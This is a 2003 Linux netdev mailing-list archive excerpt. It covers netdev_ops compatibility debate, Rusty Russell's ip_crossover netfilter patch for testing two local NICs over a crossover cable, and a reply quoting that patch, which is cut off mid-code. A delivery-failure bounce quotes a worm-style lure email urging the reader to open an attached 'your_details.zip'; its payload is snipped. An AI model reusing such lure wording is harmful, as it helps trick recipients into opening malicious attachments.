MIME-Version: 1.0 Content-Type: text/plain; charset="us-ascii" X-MimeOLE: Produced By Microsoft Exchange V6.0.6375.0 Subject: RE: [PATCH] netdev_ops Date: Thu, 10 Jul 2003 01:18:50 -0700 Message-ID: X-MS-Has-Attach: X-MS-TNEF-Correlator: Thread-Topic: [PATCH] netdev_ops Thread-Index: AcNGt+/LXquM9ebEQEO0AjBtV3zQ1gAAU8Vg From: "Feldman, Scott" To: "David S. 
Miller" Cc: , X-OriginalArrivalTime: 10 Jul 2003 08:18:51.0133 (UTC) FILETIME=[E50032D0:01C346BB] Content-Transfer-Encoding: 8bit X-MIME-Autoconverted: from quoted-printable to 8bit by oss.sgi.com id h6A8Iw2x016629 X-archive-position: 3889 X-ecartis-version: Ecartis v1.0.0 Sender: netdev-bounce@oss.sgi.com Errors-to: netdev-bounce@oss.sgi.com X-original-sender: scott.feldman@intel.com Precedence: bulk X-list: netdev > Don't tell me you're seriously considering having _TWO_ > copies of all this code sitting around? > > At that point backwards compat becomes absolutely > ridiculous. If it's important to you, just stick to the > current scheme. You gain nothing by maintaining two copies > of the same code. Either way we end up with duplicated code. If I stick with the current scheme (no netdev_ops), I duplicate in the driver all of the wrapper code that Matt has pulled into netdev_ops. Each driver that sticks to the current scheme duplicates Matt's code. With HAVE_NETDEV_OPS, you're right, we're maintaining the wrapper code outside the kernel. But it does leave open the possibility of having shared backwards-compatibility code for multiple (all?) drivers, for those stuck with supporting kernels without netdev_ops. From rusty@samba.org Thu Jul 10 01:48:22 2003 Received: with ECARTIS (v1.0.0; list netdev); Thu, 10 Jul 2003 01:48:29 -0700 (PDT) Received: from lists.samba.org (dp.samba.org [66.70.73.150]) by oss.sgi.com (8.12.9/8.12.9) with SMTP id h6A8mL2x017236 for ; Thu, 10 Jul 2003 01:48:21 -0700 Received: by lists.samba.org (Postfix, from userid 590) id 909D12C0DA; Thu, 10 Jul 2003 08:48:20 +0000 (GMT) From: Rusty Russell To: netdev@oss.sgi.com Cc: netfilter-devel@lists.netfilter.org, anton@samba.org Subject: [PATCH] Netfilter crossover module.
Date: Thu, 10 Jul 2003 18:47:05 +1000 Message-Id: <20030710084820.909D12C0DA@lists.samba.org> X-archive-position: 3890 X-ecartis-version: Ecartis v1.0.0 Sender: netdev-bounce@oss.sgi.com Errors-to: netdev-bounce@oss.sgi.com X-original-sender: rusty@rustcorp.com.au Precedence: bulk X-list: netdev Lots of people keep asking to be able to plug a crossover cable between two NICs in a machine, and use it for testing. This is a simple module which does this, by creating phantom machine(s) on each network with IP address 1 greater than the interface. Testers welcome. Ignore the backwards compat crap, it'll be out of the final version. Example usage: # Bring interfaces up ifconfig eth0 192.168.1.1 ifconfig eth1 192.168.2.1 # Add module which creates "phantom" machines 192.168.1.2, and 192.168.2.2. modprobe ip_crossover dev1=eth0 dev2=eth1 # Tell kernel that 192.168.1.2 packets go to eth1, and .2.2 to eth0. arp -s 192.168.1.2 arp -s 192.168.2.2 It'd be nice to have the module hardwire the arps itself, but this was quickest. Patch welcome. Rusty. Name: Hardware Loopback Module Author: Rusty Russell Status: Tested on 2.5.74-bk5 D: For testing it is often nice to connect two NICs with a crossover D: cable and have the machine route packets between them. D: D: Since Linux steadfastly regards IP addresses as properties of the D: box, not the individual NICs, this requires some trickery. A simple D: netfilter module makes this possible, by producing "phantom" boxes. diff -urNp --exclude TAGS -X /home/rusty/current-dontdiff --minimal linux-2.5.74-bk5/net/ipv4/netfilter/Kconfig working-2.5.74-bk5-hardware_loopback/net/ipv4/netfilter/Kconfig --- linux-2.5.74-bk5/net/ipv4/netfilter/Kconfig 2003-07-03 09:44:02.000000000 +1000 +++ working-2.5.74-bk5-hardware_loopback/net/ipv4/netfilter/Kconfig 2003-07-08 18:03:29.000000000 +1000 @@ -587,5 +587,18 @@ config IP_NF_COMPAT_IPFWADM If you want to compile it as a module, say M here and read . If unsure, say `N'.
+config IP_NF_CROSSOVER + tristate "IP forced crossover support (EXPERIMENTAL)" + depends on EXPERIMENTAL + help + This option allows you to connect two local network cards + with a crossover cable, and then force packets to pass over + that cable (Linux will normally short-circuit such packets). + + If you want to compile it as a module, say M here and read + : the module will be called + ip_crossover. + + Say `N'. endmenu diff -urNp --exclude TAGS -X /home/rusty/current-dontdiff --minimal linux-2.5.74-bk5/net/ipv4/netfilter/Makefile working-2.5.74-bk5-hardware_loopback/net/ipv4/netfilter/Makefile --- linux-2.5.74-bk5/net/ipv4/netfilter/Makefile 2003-07-03 09:44:02.000000000 +1000 +++ working-2.5.74-bk5-hardware_loopback/net/ipv4/netfilter/Makefile 2003-07-08 18:03:29.000000000 +1000 @@ -92,3 +92,5 @@ obj-$(CONFIG_IP_NF_COMPAT_IPCHAINS) += i obj-$(CONFIG_IP_NF_COMPAT_IPFWADM) += ipfwadm.o obj-$(CONFIG_IP_NF_QUEUE) += ip_queue.o + +obj-$(CONFIG_IP_NF_CROSSOVER) += ip_crossover.o diff -urNp --exclude TAGS -X /home/rusty/current-dontdiff --minimal linux-2.5.74-bk5/net/ipv4/netfilter/ip_crossover.c working-2.5.74-bk5-hardware_loopback/net/ipv4/netfilter/ip_crossover.c --- linux-2.5.74-bk5/net/ipv4/netfilter/ip_crossover.c 1970-01-01 10:00:00.000000000 +1000 +++ working-2.5.74-bk5-hardware_loopback/net/ipv4/netfilter/ip_crossover.c 2003-07-10 18:04:59.000000000 +1000 @@ -0,0 +1,257 @@ +/* Copyright 2003 Rusty Russell, IBM Corporation. + * + * Simple packet mangling. The idea is to use a crossover between two + * local NICs for testing, then this module creates "phantom" boxes on + * each network at the interface address + 1. + * + * Packets sent to one phantom will come in like they came from the other. + * + * Usage: + * ifconfig eth0 192.168.1.1 + * ifconfig eth1 192.168.2.1 + * arp -s 192.168.1.2 + * arp -s 192.168.2.2 + * modprobe ip_crossover dev1=eth0 dev2=eth1 + * + * Then doing ping 192.168.1.2, ICMP ping goes out eth0 and comes + * back in eth1. 
Reply goes out eth1 and comes back in eth0. */ +#include +#include +#include +#include +#include +#include +#include +#include +#include +#include +#include +#include + +struct ifinfo +{ + /* Keep track of name so we can drop reference. */ + char name[IFNAMSIZ]; + + /* Cached interface addr. */ + u32 ifaddr; + + /* "Phantom" box which gets mapped. */ + u32 phantom; +}; + +static struct ifinfo devinfo1, devinfo2; + +/* Stolen from Alexey's ip_nat_dumb. */ +static int nat_header(struct sk_buff *skb, u32 saddr, u32 daddr) +{ + struct iphdr *iph = skb->nh.iph; + + u32 odaddr = iph->daddr; + u32 osaddr = iph->saddr; + u16 check; + + /* Rewrite IP header */ + iph->saddr = saddr; + iph->daddr = daddr; + iph->check = 0; + iph->check = ip_fast_csum((unsigned char *)iph, iph->ihl); + + /* If it is the first fragment, rewrite protocol headers */ + if (!(iph->frag_off & htons(IP_OFFSET))) { + u16 *cksum; + + switch(iph->protocol) { + case IPPROTO_TCP: + cksum = (u16*)&((struct tcphdr*) + (((char*)iph)+(iph->ihl<<2)))->check; + if ((u8*)(cksum+1) > skb->tail) + return 0; + check = *cksum; + if (skb->ip_summed != CHECKSUM_HW) + check = ~check; + check = csum_tcpudp_magic(iph->saddr, iph->daddr, + 0, 0, check); + check = csum_tcpudp_magic(~osaddr, ~odaddr, 0, 0, + ~check); + if (skb->ip_summed == CHECKSUM_HW) + check = ~check; + *cksum = check; + break; + case IPPROTO_UDP: + cksum = (u16*)&((struct udphdr*) + (((char*)iph)+(iph->ihl<<2)))->check; + if ((u8*)(cksum+1) > skb->tail) + return 0; + if ((check = *cksum) != 0) { + check = csum_tcpudp_magic(iph->saddr, + iph->daddr, 0, 0, + ~check); + check = csum_tcpudp_magic(~osaddr, ~odaddr, + 0, 0, ~check); + *cksum = check ? 
: 0xFFFF; + } + break; + case IPPROTO_ICMP: + { + struct icmphdr *icmph + = (struct icmphdr*)((char*)iph+(iph->ihl<<2)); + struct iphdr *ciph; + u32 idaddr, isaddr; + + if ((icmph->type != ICMP_DEST_UNREACH) && + (icmph->type != ICMP_TIME_EXCEEDED) && + (icmph->type != ICMP_PARAMETERPROB)) + break; + + ciph = (struct iphdr *) (icmph + 1); + + if ((u8*)(ciph+1) > skb->tail) + return 0; + + isaddr = ciph->saddr; + idaddr = ciph->daddr; + + /* Change addresses inside ICMP packet. */ + ciph->daddr = iph->saddr; + ciph->saddr = iph->daddr; + cksum = &icmph->checksum; + /* Using tcpudp primitive. Why not? */ + check = csum_tcpudp_magic(ciph->saddr, ciph->daddr, + 0, 0, ~(*cksum)); + *cksum = csum_tcpudp_magic(~isaddr, ~idaddr, 0, 0, + ~check); + break; + } + default: + break; + } + } + return 1; +} + +static unsigned int xover_hook(unsigned int hook, + struct sk_buff **pskb, + const struct net_device *in, + const struct net_device *out, + int (*okfn)(struct sk_buff *)) +{ + /* Going out to phantom box 1: change it to coming from + phantom box 2, and vice versa. 
*/ + if ((*pskb)->nh.iph->daddr == devinfo1.phantom) { + printk(KERN_DEBUG "dev1: %u.%u.%u.%u->%u.%u.%u.%u" + " becomes %u.%u.%u.%u->%u.%u.%u.%u\n", + NIPQUAD((*pskb)->nh.iph->saddr), + NIPQUAD((*pskb)->nh.iph->daddr), + NIPQUAD(devinfo2.phantom), + NIPQUAD(devinfo2.ifaddr)); + if (!nat_header(*pskb, devinfo2.phantom, devinfo2.ifaddr)) + return NF_DROP; + } else if ((*pskb)->nh.iph->daddr == devinfo2.phantom) { + printk(KERN_DEBUG "dev2: %u.%u.%u.%u->%u.%u.%u.%u" + " becomes %u.%u.%u.%u->%u.%u.%u.%u\n", + NIPQUAD((*pskb)->nh.iph->saddr), + NIPQUAD((*pskb)->nh.iph->daddr), + NIPQUAD(devinfo1.phantom), + NIPQUAD(devinfo1.ifaddr)); + if (!nat_header(*pskb, devinfo1.phantom, devinfo1.ifaddr)) + return NF_DROP; + } + + return NF_ACCEPT; +} + +static struct nf_hook_ops xover_ops += { .hook = xover_hook, + .owner = THIS_MODULE, + .pf = PF_INET, + .hooknum = NF_IP_POST_ROUTING, + .priority = NF_IP_PRI_MANGLE, +}; + +static int __set_dev(const char *name, struct ifinfo *ifi) +{ + struct net_device *dev; + struct in_device *indev; + + dev = dev_get_by_name(name); + if (!dev) + goto fail; + indev = __in_dev_get(dev); + if (!indev || !indev->ifa_list) + goto put_fail; + + ifi->ifaddr = indev->ifa_list->ifa_address; + ifi->phantom = htonl(ntohl(indev->ifa_list->ifa_address) + 1); + if (ifi->phantom == indev->ifa_list->ifa_broadcast) + goto put_fail; + + strlcpy(ifi->name, name, sizeof(ifi->name)); + printk(KERN_INFO "ip_crossover: phantom for %s: %u.%u.%u.%u\n", + ifi->name, NIPQUAD(ifi->phantom)); + return 0; + +put_fail: + dev_put(dev); +fail: + printk(KERN_WARNING "ip_crossover: device %s is not usable.\n", name); + return -ENOENT; +} + +#if LINUX_VERSION_CODE >= KERNEL_VERSION(2,5,50) +static int set_dev(const char *val, struct kernel_param *kp) +{ + return __set_dev(val, kp->arg); +} +module_param_call(dev1, set_dev, NULL, &devinfo1, 0); +module_param_call(dev2, set_dev, NULL, &devinfo2, 0); + +#define compat_parse_params() +#else +static char *dev1, *dev2; + 
+MODULE_PARM(dev1, "s"); +MODULE_PARM(dev2, "s"); + +static void compat_parse_params(void) +{ + if (dev1) + __set_dev(dev1, &devinfo1); + if (dev2) + __set_dev(dev2, &devinfo2); +} +#endif /* KERNEL_VERSION */ + +static int __init init(void) +{ + compat_parse_params(); + + if (!devinfo1.name[0] || !devinfo2.name[0]) { + printk(KERN_ERR "ip_crossover: need dev1 and dev2 args\n"); + return -EINVAL; + } + + return nf_register_hook(&xover_ops); +} + +static void __exit fini(void) +{ + struct net_device *dev; + + nf_unregister_hook(&xover_ops); + + /* Release devices. */ + dev = dev_get_by_name(devinfo1.name); + dev_put(dev); + dev_put(dev); + + dev = dev_get_by_name(devinfo2.name); + dev_put(dev); + dev_put(dev); +} + +module_init(init); +module_exit(fini); +MODULE_LICENSE("GPL"); +MODULE_PARM_DESC(dev1, "First device for crossover (required)"); +MODULE_PARM_DESC(dev2, "Second device for crossover (required)"); -- Anyone who quotes me in their sig is an idiot. -- Rusty Russell. From MAILER-DAEMON@oss.sgi.com Thu Jul 10 02:22:16 2003 Received: with ECARTIS (v1.0.0; list netdev); Thu, 10 Jul 2003 02:22:20 -0700 (PDT) Received: from anchor-post-30.mail.demon.net (anchor-post-30.mail.demon.net [194.217.242.88]) by oss.sgi.com (8.12.9/8.12.9) with SMTP id h6A9MF2x021378 for ; Thu, 10 Jul 2003 02:22:16 -0700 Received: from finch-punt-12.mail.demon.net ([194.217.242.36]) by anchor-post-30.mail.demon.net with esmtp (Exim 3.35 #1) id 19aXd0-000EbR-0U for netdev@oss.sgi.com; Thu, 10 Jul 2003 10:22:14 +0100 Received: from root by finch-punt-12.mail.demon.net with local (Exim 2.12 #1) id 19aXdM-0004Wx-00 for netdev@oss.sgi.com; Thu, 10 Jul 2003 09:22:36 +0000 To: netdev@oss.sgi.com Subject: Mail Delivery failed: returning to sender. 
Message-Id: From: Super-User Date: Thu, 10 Jul 2003 09:22:36 +0000 X-archive-position: 3891 X-ecartis-version: Ecartis v1.0.0 Sender: netdev-bounce@oss.sgi.com Errors-to: netdev-bounce@oss.sgi.com X-original-sender: root@punt-1.mail.demon.net Precedence: bulk X-list: netdev Subject: Mail Delivery failed: returning to sender This message was created automatically by mail delivery software. A message that you sent could not be delivered to all of its recipients. The following address(es) failed: ordern.demon.co.uk [158.152.10.215]: RSET 250 Ok MAIL FROM: 250 Ok RCPT TO: 250 Ok DATA 354 End data with . . 550 Error: ordern.demon.co.uk no longer exists ----- Original Message Follows ------ Received: from punt-1.mail.demon.net by mailstore for markb@ordern.demon.co.uk id 1057820065:10:14558:0; Thu, 10 Jul 2003 06:54:25 GMT Received: from [218.244.36.158] ([218.244.36.158]) by punt-1.mail.demon.net id aa1102574; 10 Jul 2003 6:52 GMT From: To: Subject: Re: Movie Date: Thu, 10 Jul 2003 14:53:01 +0800 Importance: Normal X-Mailer: Microsoft Outlook Express 6.00.2600.0000 X-MSMail-Priority: Normal X-Priority: 3 (Normal) MIME-Version: 1.0 Content-Type: multipart/mixed; boundary="CSmtpMsgPart123X456_000_00561FB7" Message-ID: <1057819977.112574.0@[218.244.36.158]> This is a multipart message in MIME format --CSmtpMsgPart123X456_000_00561FB7 Content-Type: text/plain; charset="iso-8859-1" Content-Transfer-Encoding: 7bit Please see the attached zip file for details. 
--CSmtpMsgPart123X456_000_00561FB7 Content-Type: application/octet-stream; name="your_details.zip" Content-Transfer-Encoding: base64 Content-Disposition: attachment; filename="your_details.zip [snip - Remainder of message] From xiaofeng.ling@intel.com Thu Jul 10 02:52:41 2003 Received: with ECARTIS (v1.0.0; list netdev); Thu, 10 Jul 2003 02:52:49 -0700 (PDT) Received: from caduceus.jf.intel.com (fmr06.intel.com [134.134.136.7]) by oss.sgi.com (8.12.9/8.12.9) with SMTP id h6A9qe2x023350 for ; Thu, 10 Jul 2003 02:52:41 -0700 Received: from talaria.jf.intel.com (talaria.jf.intel.com [10.7.209.7]) by caduceus.jf.intel.com (8.11.6p2/8.11.6/d: outer.mc,v 1.66 2003/05/22 21:17:36 rfjohns1 Exp $) with ESMTP id h6A9kse07796 for ; Thu, 10 Jul 2003 09:46:54 GMT 
Received: from pdsmsxvs01.pd.intel.com (pdsmsxvs01.pd.intel.com [172.16.12.122]) by talaria.jf.intel.com (8.11.6p2/8.11.6/d: inner.mc,v 1.35 2003/05/22 21:18:01 rfjohns1 Exp $) with SMTP id h6A9IGD16154 for ; Thu, 10 Jul 2003 09:18:17 GMT Received: from pdsmsx331.ccr.corp.intel.com ([172.16.12.58]) by pdsmsxvs01.pd.intel.com (NAVGW 2.5.2.11) with SMTP id M2003071017523314179 for ; Thu, 10 Jul 2003 17:52:33 +0800 Received: from pdsmsx403.ccr.corp.intel.com ([172.16.12.55]) by pdsmsx331.ccr.corp.intel.com with Microsoft SMTPSVC(5.0.2195.5329); Thu, 10 Jul 2003 17:52:33 +0800 content-class: urn:content-classes:message MIME-Version: 1.0 Content-Type: text/plain; charset="iso-8859-1" X-MimeOLE: Produced By Microsoft Exchange V6.0.6375.0 Subject: From which version, struct sock is changed to the new one? Date: Thu, 10 Jul 2003 17:52:33 +0800 Message-ID: <3ACA40606221794F80A5670F0AF15F84FEC75E@pdsmsx403.ccr.corp.intel.com> X-MS-Has-Attach: X-MS-TNEF-Correlator: Thread-Topic: shutdown() and SHUT_RD on TCP sockets - broken? Thread-Index: AcNGBm4cMdtYv4GsSd6TNM90YSEEmgAwlGNg From: "Ling, Xiaofeng" To: X-OriginalArrivalTime: 10 Jul 2003 09:52:33.0905 (UTC) FILETIME=[FC6F1E10:01C346C8] Content-Transfer-Encoding: 8bit X-MIME-Autoconverted: from quoted-printable to 8bit by oss.sgi.com id h6A9qe2x023350 X-archive-position: 3892 X-ecartis-version: Ecartis v1.0.0 Sender: netdev-bounce@oss.sgi.com Errors-to: netdev-bounce@oss.sgi.com X-original-sender: xiaofeng.ling@intel.com Precedence: bulk X-list: netdev Hi, Can anybody tell me in which version struct sock was changed to the new one?
From willy@www.linux.org.uk Thu Jul 10 04:21:53 2003 Received: with ECARTIS (v1.0.0; list netdev); Thu, 10 Jul 2003 04:21:57 -0700 (PDT) Received: from www.linux.org.uk (IDENT:a5rZdsWhp+zZzgHymaXCZbaibPzWeIUd@parcelfarce.linux.theplanet.co.uk [195.92.249.252]) by oss.sgi.com (8.12.9/8.12.9) with SMTP id h6ABLq2x027287 for ; Thu, 10 Jul 2003 04:21:53 -0700 Received: from willy by www.linux.org.uk with local (Exim 4.14) id 19aZUj-00041y-3q; Thu, 10 Jul 2003 12:21:49 +0100 Date: Thu, 10 Jul 2003 12:21:49 +0100 From: Matthew Wilcox To: "Feldman, Scott" Cc: Matthew Wilcox , netdev@oss.sgi.com Subject: Re: [PATCH] netdev_ops Message-ID: <20030710112149.GC1939@parcelfarce.linux.theplanet.co.uk> References: Mime-Version: 1.0 Content-Type: text/plain; charset=us-ascii Content-Disposition: inline In-Reply-To: User-Agent: Mutt/1.4.1i X-archive-position: 3893 X-ecartis-version: Ecartis v1.0.0 Sender: netdev-bounce@oss.sgi.com Errors-to: netdev-bounce@oss.sgi.com X-original-sender: willy@debian.org Precedence: bulk X-list: netdev On Thu, Jul 10, 2003 at 12:47:13AM -0700, Feldman, Scott wrote: > Can we get a HAVE_NETDEV_OPS? I'll seriously consider it ... once we have a better idea where this is all going. I'm a big fan of having _shared_ compatibility code rather than something in each driver. Obviously we'll want to share drivers between 2.4 and 2.6. -- "It's not Hollywood. War is real, war is primarily not about defeat or victory, it is about death. I've seen thousands and thousands of dead bodies. Do you think I want to have an academic debate on this subject?" 
-- Robert Fisk From jgarzik@pobox.com Thu Jul 10 06:07:06 2003 Received: with ECARTIS (v1.0.0; list netdev); Thu, 10 Jul 2003 06:07:12 -0700 (PDT) Received: from www.linux.org.uk (IDENT:Xhzk3CuXWSGr7fOMlBB9eC8Mk7Zr8Nu3@parcelfarce.linux.theplanet.co.uk [195.92.249.252]) by oss.sgi.com (8.12.9/8.12.9) with SMTP id h6AD752x028398 for ; Thu, 10 Jul 2003 06:07:06 -0700 Received: from rdu26-227-011.nc.rr.com ([66.26.227.11] helo=pobox.com) by www.linux.org.uk with esmtp (Exim 4.14) id 19ab8Z-0005d0-I3; Thu, 10 Jul 2003 14:07:03 +0100 Message-ID: <3F0D64E2.9000801@pobox.com> Date: Thu, 10 Jul 2003 09:06:42 -0400 From: Jeff Garzik Organization: none User-Agent: Mozilla/5.0 (X11; U; Linux i686; en-US; rv:1.2.1) Gecko/20021213 Debian/1.2.1-2.bunk X-Accept-Language: en MIME-Version: 1.0 To: Matthew Wilcox CC: "Feldman, Scott" , netdev@oss.sgi.com Subject: Re: [PATCH] netdev_ops References: <20030710112149.GC1939@parcelfarce.linux.theplanet.co.uk> In-Reply-To: <20030710112149.GC1939@parcelfarce.linux.theplanet.co.uk> Content-Type: text/plain; charset=us-ascii; format=flowed Content-Transfer-Encoding: 7bit X-archive-position: 3894 X-ecartis-version: Ecartis v1.0.0 Sender: netdev-bounce@oss.sgi.com Errors-to: netdev-bounce@oss.sgi.com X-original-sender: jgarzik@pobox.com Precedence: bulk X-list: netdev Matthew Wilcox wrote: > On Thu, Jul 10, 2003 at 12:47:13AM -0700, Feldman, Scott wrote: > >>Can we get a HAVE_NETDEV_OPS? > > > I'll seriously consider it ... once we have a better idea where this is > all going. I'm a big fan of having _shared_ compatibility code rather > than something in each driver. Obviously we'll want to share drivers > between 2.4 and 2.6. Something like... oh... kcompat? 
:) http://sf.net/projects/gkernel/ From jleu@nero.doit.wisc.edu Thu Jul 10 07:06:48 2003 Received: with ECARTIS (v1.0.0; list netdev); Thu, 10 Jul 2003 07:07:24 -0700 (PDT) Received: from nero.doit.wisc.edu (nero.doit.wisc.edu [128.104.17.130]) by oss.sgi.com (8.12.9/8.12.9) with SMTP id h6AE6k2x002374 for ; Thu, 10 Jul 2003 07:06:47 -0700 Received: (from jleu@localhost) by nero.doit.wisc.edu (8.11.6/8.11.6) id h6AE6hP10833; Thu, 10 Jul 2003 09:06:43 -0500 Date: Thu, 10 Jul 2003 09:06:43 -0500 From: "James R. Leu" To: Rusty Russell Cc: netdev@oss.sgi.com, netfilter-devel@lists.netfilter.org, anton@samba.org Subject: Re: [PATCH] Netfilter crossover module. Message-ID: <20030710090643.A10820@mindspring.com> Reply-To: jleu@mindspring.com References: <20030710084820.909D12C0DA@lists.samba.org> Mime-Version: 1.0 Content-Type: text/plain; charset=us-ascii X-Mailer: Mutt 1.0.1i In-Reply-To: <20030710084820.909D12C0DA@lists.samba.org>; from rusty@rustcorp.com.au on Thu, Jul 10, 2003 at 06:47:05PM +1000 Organization: none X-archive-position: 3895 X-ecartis-version: Ecartis v1.0.0 Sender: netdev-bounce@oss.sgi.com Errors-to: netdev-bounce@oss.sgi.com X-original-sender: jleu@mindspring.com Precedence: bulk X-list: netdev Between you and Ben Greear, the Linux kernel will have every possible scheme for sending packets to yourself. I still think my work on this (Virtual routing and forwarding: http://linux-vrf.sf.net/) is less perverted(*) than the work that either you or Ben has come up with. Plus, it has other applications besides just being able to send packets to yourself. * in terms of the concept, not necessarily the actual implementation. On Thu, Jul 10, 2003 at 06:47:05PM +1000, Rusty Russell wrote: > Lots of people keep asking to be able to plug a crossover cables > between to NICs in a machine, and use it for testing. > > This is a simple module which does this, by creating phantom > machine(s) on each network with IP address 1 greater than the > interface. 
Testers welcome. > > Ignore the backwards compat crap, it'll be out of the final version. > > Example usage: > # Bring interfaces up > ifconfig eth0 192.168.1.1 > ifconfig eth1 192.168.2.1 > > # Add module which creates "phantom" machines 192.168.1.2, and 192.168.2.2. > modprobe ip_crossover dev1=eth0 dev2=eth1 > > # Tell kernel that 192.168.1.2 packets go to eth1, and .2.1 to eth0. > arp -s 192.168.1.2 > arp -s 192.168.2.2 > > It'd be nice to have the module hardwire the arps itself, but this was > quickest. Patch welcome. > > Rusty. > > Name: Hardware Loopback Module > Author: Rusty Russell > Status: Tested on 2.5.74-bk5 > > D: For testing it is often nice to connect two NICs with a crossover > D: cable and have the machine route packets between them. > D: > D: Since Linux steadfastly regards IP addresses as properties of the > D: box, not the individual NICs, this requires some trickery. A simple > D: netfilter module makes this possible, by producing "phantom" boxes. > > diff -urNp --exclude TAGS -X /home/rusty/current-dontdiff --minimal linux-2.5.74-bk5/net/ipv4/netfilter/Kconfig working-2.5.74-bk5-hardware_loopback/net/ipv4/netfilter/Kconfig > --- linux-2.5.74-bk5/net/ipv4/netfilter/Kconfig 2003-07-03 09:44:02.000000000 +1000 > +++ working-2.5.74-bk5-hardware_loopback/net/ipv4/netfilter/Kconfig 2003-07-08 18:03:29.000000000 +1000 > @@ -587,5 +587,18 @@ config IP_NF_COMPAT_IPFWADM > If you want to compile it as a module, say M here and read > . If unsure, say `N'. > > +config IP_NF_CROSSOVER > + tristate "IP forced crossover support (EXPERIMENTAL)" > + depends on EXPERIMENTAL > + help > + This option allows you to connect two local network cards > + with a crossover cable, and then force packets to pass over > + that cable (Linux will normally short-circuit such packets). > + > + If you want to compile it as a module, say M here and read > + : the module will be called > + ip_crossover. > + > + Say `N'. 
> endmenu > > diff -urNp --exclude TAGS -X /home/rusty/current-dontdiff --minimal linux-2.5.74-bk5/net/ipv4/netfilter/Makefile working-2.5.74-bk5-hardware_loopback/net/ipv4/netfilter/Makefile > --- linux-2.5.74-bk5/net/ipv4/netfilter/Makefile 2003-07-03 09:44:02.000000000 +1000 > +++ working-2.5.74-bk5-hardware_loopback/net/ipv4/netfilter/Makefile 2003-07-08 18:03:29.000000000 +1000 > @@ -92,3 +92,5 @@ obj-$(CONFIG_IP_NF_COMPAT_IPCHAINS) += i > obj-$(CONFIG_IP_NF_COMPAT_IPFWADM) += ipfwadm.o > > obj-$(CONFIG_IP_NF_QUEUE) += ip_queue.o > + > +obj-$(CONFIG_IP_NF_CROSSOVER) += ip_crossover.o > diff -urNp --exclude TAGS -X /home/rusty/current-dontdiff --minimal linux-2.5.74-bk5/net/ipv4/netfilter/ip_crossover.c working-2.5.74-bk5-hardware_loopback/net/ipv4/netfilter/ip_crossover.c > --- linux-2.5.74-bk5/net/ipv4/netfilter/ip_crossover.c 1970-01-01 10:00:00.000000000 +1000 > +++ working-2.5.74-bk5-hardware_loopback/net/ipv4/netfilter/ip_crossover.c 2003-07-10 18:04:59.000000000 +1000 > @@ -0,0 +1,257 @@ > +/* Copyright 2003 Rusty Russell, IBM Corporation. > + * > + * Simple packet mangling. The idea is to use a crossover between two > + * local NICs for testing, then this module creates "phantom" boxes on > + * each network at the interface address + 1. > + * > + * Packets sent to one phantom will come in like they came from the other. > + * > + * Usage: > + * ifconfig eth0 192.168.1.1 > + * ifconfig eth1 192.168.2.1 > + * arp -s 192.168.1.2 > + * arp -s 192.168.2.2 > + * modprobe ip_crossover dev1=eth0 dev2=eth1 > + * > + * Then doing ping 192.168.1.2, ICMP ping goes out eth0 and comes > + * back in eth1. Reply goes out eth1 and comes back in eth0. */ > +#include > +#include > +#include > +#include > +#include > +#include > +#include > +#include > +#include > +#include > +#include > +#include > + > +struct ifinfo > +{ > + /* Keep track of name so we can drop reference. */ > + char name[IFNAMSIZ]; > + > + /* Cached interface addr. 
*/ > + u32 ifaddr; > + > + /* "Phantom" box which gets mapped. */ > + u32 phantom; > +}; > + > +static struct ifinfo devinfo1, devinfo2; > + > +/* Stolen from Alexey's ip_nat_dumb. */ > +static int nat_header(struct sk_buff *skb, u32 saddr, u32 daddr) > +{ > + struct iphdr *iph = skb->nh.iph; > + > + u32 odaddr = iph->daddr; > + u32 osaddr = iph->saddr; > + u16 check; > + > + /* Rewrite IP header */ > + iph->saddr = saddr; > + iph->daddr = daddr; > + iph->check = 0; > + iph->check = ip_fast_csum((unsigned char *)iph, iph->ihl); > + > + /* If it is the first fragment, rewrite protocol headers */ > + if (!(iph->frag_off & htons(IP_OFFSET))) { > + u16 *cksum; > + > + switch(iph->protocol) { > + case IPPROTO_TCP: > + cksum = (u16*)&((struct tcphdr*) > + (((char*)iph)+(iph->ihl<<2)))->check; > + if ((u8*)(cksum+1) > skb->tail) > + return 0; > + check = *cksum; > + if (skb->ip_summed != CHECKSUM_HW) > + check = ~check; > + check = csum_tcpudp_magic(iph->saddr, iph->daddr, > + 0, 0, check); > + check = csum_tcpudp_magic(~osaddr, ~odaddr, 0, 0, > + ~check); > + if (skb->ip_summed == CHECKSUM_HW) > + check = ~check; > + *cksum = check; > + break; > + case IPPROTO_UDP: > + cksum = (u16*)&((struct udphdr*) > + (((char*)iph)+(iph->ihl<<2)))->check; > + if ((u8*)(cksum+1) > skb->tail) > + return 0; > + if ((check = *cksum) != 0) { > + check = csum_tcpudp_magic(iph->saddr, > + iph->daddr, 0, 0, > + ~check); > + check = csum_tcpudp_magic(~osaddr, ~odaddr, > + 0, 0, ~check); > + *cksum = check ? 
: 0xFFFF; > + } > + break; > + case IPPROTO_ICMP: > + { > + struct icmphdr *icmph > + = (struct icmphdr*)((char*)iph+(iph->ihl<<2)); > + struct iphdr *ciph; > + u32 idaddr, isaddr; > + > + if ((icmph->type != ICMP_DEST_UNREACH) && > + (icmph->type != ICMP_TIME_EXCEEDED) && > + (icmph->type != ICMP_PARAMETERPROB)) > + break; > + > + ciph = (struct iphdr *) (icmph + 1); > + > + if ((u8*)(ciph+1) > skb->tail) > + return 0; > + > + isaddr = ciph->saddr; > + idaddr = ciph->daddr; > + > + /* Change addresses inside ICMP packet. */ > + ciph->daddr = iph->saddr; > + ciph->saddr = iph->daddr; > + cksum = &icmph->checksum; > + /* Using tcpudp primitive. Why not? */ > + check = csum_tcpudp_magic(ciph->saddr, ciph->daddr, > + 0, 0, ~(*cksum)); > + *cksum = csum_tcpudp_magic(~isaddr, ~idaddr, 0, 0, > + ~check); > + break; > + } > + default: > + break; > + } > + } > + return 1; > +} > + > +static unsigned int xover_hook(unsigned int hook, > + struct sk_buff **pskb, > + const struct net_device *in, > + const struct net_device *out, > + int (*okfn)(struct sk_buff *)) > +{ > + /* Going out to phantom box 1: change it to coming from > + phantom box 2, and vice versa. 
